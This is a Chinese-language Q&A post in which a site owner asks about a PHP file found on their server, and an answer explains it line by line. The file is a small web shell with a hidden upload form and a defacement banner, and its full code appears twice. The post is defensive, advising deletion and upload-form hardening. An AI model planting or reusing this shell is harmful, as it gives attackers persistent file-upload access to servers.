我刚刚在我的主机上找到一些PHP文件,PHP有0.01%的知识,有人能解释一下这个代码是怎么做的吗?
<?php if(isset($_GET["ourzr"])){
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>gagal";}
}
}?>
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>
body{overflow:hidden;background-color:black}
#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}
最佳答案
代码分解:
如果查询字符串中的变量有值(即index.php?ourzr=set
)
<?php
if(isset($_GET["ourzr"])){
然后使用
php_uname()
函数显示有关服务器操作系统的信息,它们使用此信息针对您的系统细节进行下一轮黑客攻击。echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
创建一个允许上传更多黑客文件的html表单
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
如果文件已上载,请将文件从临时文件夹复制到没有临时名称但只有原始名称的普通文件夹
if($_POST["v"]==up){
if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>sucess</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>failed</b>";
}
}
}
?>
这部分只是一个小小的台词,上面写着“我是来自黑帮的一个滑稽的脚本孩子”
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}
结论:
尽快删除此文件
这个脚本以某种方式通过一些可能仍然存在的漏洞上传到您的服务器(除非黑客很好地为您修复它)。
他们在你的服务器上找到了一个可以访问的文件,现在他们想用它继续上传脚本和其他恶意数据。删除此文件,并查看网站上载任何类型文件的任何位置的安全性。
下一步:
了解黑客如何使用文件上载来上载此类脚本,以及他们可以使用自己的上载表单执行的其他操作:
https://www.acunetix.com/websitesecurity/upload-forms-threat/
阅读如何创建安全上载脚本:There are many other tutorials
阅读更多关于安全性的内容,并尝试学习一点php。如果你有更具体的问题请告诉我
我想追捕这家伙:https://twitter.com/d3b_x